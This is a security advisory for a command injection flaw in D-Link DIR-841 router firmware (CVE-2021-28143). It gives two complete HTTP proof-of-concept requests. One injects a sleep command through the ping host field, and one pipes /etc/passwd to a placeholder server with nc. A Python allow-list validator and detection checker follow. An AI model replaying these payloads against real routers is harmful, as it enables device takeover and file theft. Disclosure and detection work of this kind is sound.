# D-Link DIR-841 Command Injection (CVE-2021-28143)

D-Link DIR-841 firmware 3.03 and 3.04 contain an authenticated command injection in the "System Tools" (ping/ping6/traceroute) functions: the target host is passed to a shell command without sanitisation, which lets an attacker who holds admin credentials take full control of the device.

PoC:

```http
POST /jsonrpc HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Digest username="admin", realm="domain", nonce="4784226", uri="/jsonrpc", response="84799b55020cf2c53e28214e3d60b899", qop=auth, nc=00000035, cnonce="bPzBB3mcvSb51Ijx"
Content-Length: 156
Origin: IP
Connection: close
Referer: http://ip-address:9821/admin/index.html
Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=

{"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"'127.0.0.1 & sleep 5'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757}
```

Exfiltrating files

```http
POST /jsonrpc HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Digest username="admin", realm="domain", nonce="4784226", uri="/jsonrpc", response="84799b55020cf2c53e28214e3d60b899", qop=auth, nc=00000035, cnonce="bPzBB3mcvSb51Ijx"
Content-Length: 156
Origin: IP
Connection: close
Referer: http://ip-address:9821/admin/index.html
Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=

{"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"'127.0.0.1 & nc SERVER-IP 1234 < /etc/passwd'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757}
```

ref:

* https://nvd.nist.gov/vuln/detail/CVE-2021-28143
* https://github.com/vitorespf/Advisories/blob/master/DLINK-DIR-841-command-injection.txt
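An added example, not part of the advisory or of D-Link's firmware: the allow-list check that the ping/ping6/traceroute handler needs on the `host` field, plus a verdict function that a WAF rule or log review can run over `/jsonrpc` request bodies. The `write` method, the `params.data.host` layout and the sleep-based body are taken from the PoC requests above; `is_safe_host`, `check_jsonrpc_write` and the sample strings are names and constructed data of my own.

```python
import ipaddress
import json
import re

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
# Shell metacharacters that let a 'host' value break out of the ping command line.
_SHELL_META = set("&|;`$(){}<>'\"\\\n\r ")

def is_safe_host(host) -> bool:
    """Allow-list check: accept only an IP literal or a plain hostname."""
    if not isinstance(host, str) or not host:
        return False
    try:
        ipaddress.ip_address(host)  # ValueError if not a valid IPv4/IPv6 literal
        return True
    except ValueError:
        return _HOSTNAME_RE.match(host) is not None

def suspicious_chars(host: str) -> set:
    """Deny-list view for alerting: which shell metacharacters appear in host."""
    return {c for c in host if c in _SHELL_META}

def check_jsonrpc_write(body: str) -> dict:
    """Verdict for one /jsonrpc body (only 'write' calls with params.data.host reach the ping tool)."""
    try:
        req = json.loads(body)
    except json.JSONDecodeError:
        return {"relevant": False, "allowed": False, "reason": "malformed JSON"}
    params = req.get("params") if isinstance(req, dict) and req.get("method") == "write" else None
    data = params.get("data") if isinstance(params, dict) else None
    host = data.get("host") if isinstance(data, dict) else None
    if host is None:
        return {"relevant": False, "allowed": True, "reason": "no host parameter"}
    if is_safe_host(host):
        return {"relevant": True, "allowed": True, "reason": "host is an IP or hostname"}
    bad = "".join(sorted(suspicious_chars(str(host))))
    return {"relevant": True, "allowed": False,
            "reason": f"host rejected; shell metacharacters {bad!r}"}

# Constructed samples: the sleep-based PoC body from this advisory and a benign variant.
POC_SLEEP = ('{"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":'
             '"\'127.0.0.1 & sleep 5\'","count":1,"is_ipv6":false,"max_ttl":30,'
             '"nqueries":2,"waittime":3},"save":true},"id":757}')
BENIGN = POC_SLEEP.replace("'127.0.0.1 & sleep 5'", "127.0.0.1")
```

The same verdict function can be run over captured request bodies from the device's web interface to spot attempts after the fact, since a legitimate ping target never contains a space, quote or `&`.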
